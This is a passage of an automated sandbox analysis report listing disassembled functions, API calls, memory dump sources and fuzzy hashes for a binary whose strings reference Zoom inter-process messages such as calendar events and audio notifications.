                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.keybase.message,00009D36,data,00000004), ref: 00C74622
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.keybase.message$data
                • API String ID: 3166440930-2581813706
                • Opcode ID: b4c539e4b1ae08ecc440e8b8dca4ba27eec4fdaa8a9423da356fdbee3f4feca3
                • Instruction ID: 8476c8c8f8100e5e0467d521c8f05a428630d398da8f701f99afc4c72aa10f31
                • Opcode Fuzzy Hash: b4c539e4b1ae08ecc440e8b8dca4ba27eec4fdaa8a9423da356fdbee3f4feca3
                • Instruction Fuzzy Hash: 82E0D8F4A01380A7D7307B149C45B1E66B4DB50756F404528B2015B392CBF48984D7B6
                Function 00C6E610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E617
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.audio.quality.notification,00009CE0,AudioQuality,00000004), ref: 00C6E632
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: AudioQuality$com.zoom.app.assistant.audio.quality.notification
                • API String ID: 4281283084-4212809801
                • Opcode ID: a1d1029a13caa10a01b25fe02bdbba82f93da504962b5f8c6ba6c81953e17770
                • Instruction ID: 3bd58b885e14a953101709d57d1113202cad520faa459ba8a8f884728bf11a46
                • Opcode Fuzzy Hash: a1d1029a13caa10a01b25fe02bdbba82f93da504962b5f8c6ba6c81953e17770
                • Instruction Fuzzy Hash: 74E0D8B0A0038067D721BB148C8AB1E66A4AF5071AF54442DB1015B3C2CBF48880DB74
                Function 00C6C7D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C7D7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.inter.process.audio.sharing.service.unregister.response,000027D8,result,00000004), ref: 00C6C7F2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.unregister.response$result
                • API String ID: 4281283084-120618529
                • Opcode ID: 27d48a779df756f68057c24ea1a0e271870551f09a97d4afe25c4c9d91874ef5
                • Instruction ID: 5221ffc4bbaac03cbd24e1e9ac766305f4945ca17ba3e70ce2cd328397db045a
                • Opcode Fuzzy Hash: 27d48a779df756f68057c24ea1a0e271870551f09a97d4afe25c4c9d91874ef5
                • Instruction Fuzzy Hash: 74E0D8B0A4078057C7207B144C8D75E26E49F54716F50451DB1455F3D1CBF44841DB76
                Function 00C6E7F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E7F7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.load.service.response,00009DD1,result,00000004), ref: 00C6E812
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.load.service.response$result
                • API String ID: 4281283084-3275189271
                • Opcode ID: bfbca34ae29e8e220fa9e02ade98480569f6ba7ab1d3f35c3e4ffa5c0e8a6e90
                • Instruction ID: 43f7d70816c17270b7ea26c6e2af755db02374d5759563465fd1811492a17491
                • Opcode Fuzzy Hash: bfbca34ae29e8e220fa9e02ade98480569f6ba7ab1d3f35c3e4ffa5c0e8a6e90
                • Instruction Fuzzy Hash: E8E0927090079067DB20AB55984571A22A49740B1AF440429B2055B392CEF84D04D774
                Function 00C72740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72747
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onuserupdated.notify,00009E7A,UsersJson,00000004), ref: 00C72762
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UsersJson$com.zoom.app.cci.ccivideo.onuserupdated.notify
                • API String ID: 3166440930-801263643
                • Opcode ID: 00caea4790d4118d59aee05a402e2f8cb9bceadbefcf7a5ccf05603fdae3c410
                • Instruction ID: 56e20a15f7e93f0a33d8b44f6d475d6742a6c468194a12f999315a9e5b0c003a
                • Opcode Fuzzy Hash: 00caea4790d4118d59aee05a402e2f8cb9bceadbefcf7a5ccf05603fdae3c410
                • Instruction Fuzzy Hash: 2DE0D8B0A003C0A7D7206B659C46B2E72B4EB50B16F504528B2019F3D2CFF44844D7B9
                Function 00C76710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76717
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.ps.response_to_term,0001388D,response,00000004), ref: 00C76732
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.ps.response_to_term$response
                • API String ID: 4281283084-1659213714
                • Opcode ID: 4e73cdf31405a602920e2bb170c0a4e5792e8b76630c87174ec6db1c935dfa44
                • Instruction ID: 6b041142156e9449e844785a79d6e0a124dad39d9364c6a3c02d2e9e6ab6ac24
                • Opcode Fuzzy Hash: 4e73cdf31405a602920e2bb170c0a4e5792e8b76630c87174ec6db1c935dfa44
                • Instruction Fuzzy Hash: C5E0DFB0A01380A7DB20BF148C85B2E62A4AB41B1AF80456CB2045B383CFF40D40D778
                Function 00C5C8D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C8D7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5C8F2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.mapi.outlook.get.mapi.calendar.events$strJsonEvents
                • API String ID: 3166440930-2161916155
                • Opcode ID: ab2ff0e364dfffd5f9e22fa7bd240393c3913a20013c56d849b4f9695ad85856
                • Instruction ID: 1f59ea29537007276735d23abd79ffa50944ebf77ced4cea509e38621c5428df
                • Opcode Fuzzy Hash: ab2ff0e364dfffd5f9e22fa7bd240393c3913a20013c56d849b4f9695ad85856
                • Instruction Fuzzy Hash: DCE0D8B5A003C067CB20BB108C85B1E66B5B790756F01493CB5025B392CBF84984D774
                Function 00C728D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C728D7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getsupportcountryinfo.request,00009E88,JsCallID,00000004), ref: 00C728F2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
